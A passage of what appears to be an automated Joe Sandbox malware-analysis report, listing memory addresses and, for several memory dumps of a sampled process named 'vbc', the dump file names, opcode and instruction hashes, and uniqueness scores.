      0x00336267
      0x0033626d
      0x0033626f
      0x00336275
      0x0033627b
      0x0033627d
      0x0033627f
      0x00336283
      0x0033628a
      0x0033628c
      0x0033628f
      0x00336290
      0x00336290
      0x00336294
      0x00336296
      0x00336298
      0x0033629b
      0x0033629d
      0x0033629e
      0x003362a0
      0x003362a0
      0x003362a2
      0x003362a4
      0x003362a6
      0x003362a8
      0x003362a8
      0x003362a9
      0x003362ac
      0x003362ae
      0x003362b1
      0x003362b3
      0x003362b5
      0x003362bb
      0x003362bd
      0x003362c1
      0x003362c3
      0x003362c5
      0x003362c7
      0x003362ca

      Memory Dump Source
      • Source File: 00000004.00000002.961501476.0000000000302000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true
      • Associated: 00000004.00000002.961497133.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.961527489.000000000033C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_300000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a8d06199f755a183e1f012acaaa6e3f92452c88391cc2a0f072765b5cd8c3806
      • Instruction ID: 9c15bbd72fe12f3a96b6ec24e85af5f4c838358c2090e2a1477e06f2449dd2e0
      • Opcode Fuzzy Hash: a8d06199f755a183e1f012acaaa6e3f92452c88391cc2a0f072765b5cd8c3806
      • Instruction Fuzzy Hash: 5F72D96654E3E19FCB138B348CB56917FB0AE0322471E46DBC8C5CF4A3D229984AD763
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cef5d863a616033851dd14e9a7946e4380d9a7cd4559865e29d1fbbd0cca226c
      • Instruction ID: 7a20229436c843f58b7b91654e65af1a89542162ee1254b0cad1b38d3913f4e5
      • Opcode Fuzzy Hash: cef5d863a616033851dd14e9a7946e4380d9a7cd4559865e29d1fbbd0cca226c
      • Instruction Fuzzy Hash: FC02D275A00218DFDB15CFA5C980E9DBBB2FF49304F1580A9E509AB272DB31D9A5DF10
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 32b3c5768f6c9c38db8592997b7bfd52a0c5fa257b54b04a4fbd126a270e3cee
      • Instruction ID: 3fccc6abbe745f0d0ddc5d6b01675445d0f82c067bcd50870c0d8f28a7545fec
      • Opcode Fuzzy Hash: 32b3c5768f6c9c38db8592997b7bfd52a0c5fa257b54b04a4fbd126a270e3cee
      • Instruction Fuzzy Hash: 53614D6190E3D54FD7078B359C696C67FB1AF53244F4A80EBC488DB1A3E678095ACB22
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000004.00000002.961459072.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5b46ad4eedaab83b67fcb82974a9e95d1ca9c0f3eca4fd53d6e7c0ee99812df7
      • Instruction ID: 60d473d9a42dd03f57b5d2ea8a0bd95b9df6fa31e2f2184fe2227a5bab11d520
      • Opcode Fuzzy Hash: 5b46ad4eedaab83b67fcb82974a9e95d1ca9c0f3eca4fd53d6e7c0ee99812df7
      • Instruction Fuzzy Hash: 8551C675E042588FDB18CFA6D940ADDBBF2BF89300F14C1BAD509AB255EB305A55CF50
      Uniqueness

      Uniqueness Score: -1.00%